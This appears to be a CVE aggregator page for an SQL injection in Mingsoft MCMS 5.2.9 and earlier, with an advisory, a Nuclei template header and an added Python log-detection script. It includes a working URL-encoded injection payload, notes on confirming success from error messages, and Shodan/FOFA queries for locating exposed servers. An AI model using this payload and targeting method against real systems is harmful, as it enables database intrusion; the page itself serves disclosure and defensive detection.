CVE-2022-4375
Published 2022-12-09
Priority P264 · critical · 9.8 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 2.89% (85.1th percentile)
A vulnerability was found in Mingsoft MCMS up to 5.2.9 and has been classified as critical. It affects an unknown function of the file /cms/category/list. Manipulation of the argument sqlWhere leads to SQL injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.2.10 addresses this issue, and upgrading the affected component is recommended. The identifier of this vulnerability is VDB-215196.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mingsoft | mcms | < 5.2.10 | 5.2.10 |
Detection & IOCs (extracted from sources)
command: sqlWhere=%5b%7b%22%61%63%74%69%6f%6e%22%3a%22%22%2c%22%66%69%65%6c%64%22%3a%22%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%78%37%65%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%28%64%61%74%61%62%61%73%65%28%29%29%29%29%22%2c%22%65%6c%22%3a%22%65%71%22%2c%22%6d%6f%64%65%6c%22%3a%22%63%6f%6e%74%65%6e%74%54%69%74%6c%65%22%2c%22%6e%61%6d%65%22%3a%22%e6%96%87%e7%ab%a0%e6%a0%87%e9%a2%98%22%2c%22%74%79%70%65%22%3a%22%69%6e%70%75%74%22%2c%22%76%61%6c%75%65%22%3a%22%61%22%7d%5d
other: http.favicon.hash:1464851260
other: icon_hash="1464851260"
- Exploit sends a POST request to /cms/category/list with a URL-encoded JSON payload in the sqlWhere parameter containing extractvalue(0x7e,concat(0x7e,(database()))) to trigger SQL injection.
- Successful exploitation is indicated by a 500 or 200 HTTP response containing 'java.sql.SQLSyntaxErrorException' or 'java.sql.SQLException' in the response body.
- Response body may also contain 'Icategorydao.xml' or 'cms_category' as additional confirmation of SQL injection triggering the MCMS category DAO layer.
- Fingerprint the target as Mingsoft MCMS by checking the HTTP response body for the string 'mingsoft.net' before attempting exploitation.
- Use Shodan query http.favicon.hash:1464851260 or FOFA query icon_hash="1464851260" to identify internet-exposed Mingsoft MCMS instances.
- The vulnerability affects Mingsoft MCMS versions up to and including 5.2.9; version 5.2.10 is patched.
- The endpoint /cms/category/list accepts the sqlWhere parameter via POST with Content-Type application/x-www-form-urlencoded; the injection is in the sqlWhere field, which is passed unsanitized to the SQL layer.
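A log-side check built from the indicators listed above, as an added example (not part of the original page, the Nuclei template, or MCMS itself). The record layout (method, path, body, response_body), the bare-identifier allowlist for "field", and the sample records are assumptions constructed for illustration.

```python
import json
import re
from urllib.parse import parse_qs, urlencode

TARGET_PATH = "/cms/category/list"
# Response-body markers taken from the detection notes above.
ERROR_MARKERS = ("java.sql.SQLSyntaxErrorException", "java.sql.SQLException",
                 "Icategorydao.xml", "cms_category")
# Assumption: a legitimate "field" is a bare column identifier, nothing else.
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_.]{0,63}")

def suspicious_fields(body: str) -> list:
    """Return sqlWhere "field" values (URL-decoded) that are not bare identifiers."""
    bad = []
    for raw in parse_qs(body, keep_blank_values=True).get("sqlWhere", []):
        try:
            conds = json.loads(raw)
        except json.JSONDecodeError:
            conds = None
        if not isinstance(conds, list):
            bad.append(raw)  # not a JSON condition list at all: flag the raw value
            continue
        for cond in conds:
            field = cond.get("field") if isinstance(cond, dict) else cond
            if field is not None and not (isinstance(field, str) and IDENT.fullmatch(field)):
                bad.append(str(field))
    return bad

def classify(record: dict) -> str:
    """Grade one logged request/response pair against the indicators."""
    if record["method"] != "POST" or record["path"].split("?")[0] != TARGET_PATH:
        return "ignore"
    if not suspicious_fields(record["body"]):
        return "benign"
    hit = any(m in record.get("response_body", "") for m in ERROR_MARKERS)
    return "injection-confirmed" if hit else "injection-attempt"

def _body(field: str) -> str:
    cond = {"action": "", "field": field, "el": "eq", "type": "input", "value": "a"}
    return urlencode({"sqlWhere": json.dumps([cond])})

# Constructed sample records; PAGE_FIELD is the string quoted in the notes above.
PAGE_FIELD = "extractvalue(0x7e,concat(0x7e,(database())))"
SAMPLES = [
    {"method": "POST", "path": TARGET_PATH, "body": _body("content_title"), "response_body": '{"result":true}'},
    {"method": "POST", "path": TARGET_PATH, "body": _body(PAGE_FIELD), "response_body": "java.sql.SQLSyntaxErrorException: XPATH syntax error"},
    {"method": "POST", "path": TARGET_PATH, "body": _body(PAGE_FIELD), "response_body": "request blocked"},
]
for rec in SAMPLES:
    print(classify(rec), suspicious_fields(rec["body"]))
```

Matching on the decoded JSON "field" rather than on the raw percent-encoded body keeps the check independent of how the client chose to encode the parameter.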
GHSA
Mingsoft MCMS vulnerable to SQL Injection
ghsa·2022-12-09
CVE-2022-4375 [CRITICAL] CWE-89 Mingsoft MCMS vulnerable to SQL Injection
OSV
Mingsoft MCMS vulnerable to SQL Injection
osv·2022-12-09
CVE-2022-4375 [CRITICAL] Mingsoft MCMS vulnerable to SQL Injection
No detection rules found.
Nuclei
Mingsoft MCMS - SQL Injection
nuclei·CVSS 9.8
CVE-2022-4375 [CRITICAL] Mingsoft MCMS - SQL Injection
SQL injection vulnerability in Mingsoft MCMS up to 5.2.9 via the sqlWhere parameter in /cms/category/list.
Template:
```yaml
id: CVE-2022-4375
info:
  name: Mingsoft MCMS - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    SQL injection vulnerability in Mingsoft MCMS up to 5.2.9 via the sqlWhere parameter in /cms/category/list.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive data.
  remediation: |
    Apply the vendor-supplied patch or update to the latest version.
  reference:
    - https://gitee.com/mingSoft/MCMS/issues/I61TG5
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4375
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4375
    cwe-id: CWE-89,CWE-707
    epss-score: 0.26
```
No writeups or analysis indexed.
Published: 2022-12-09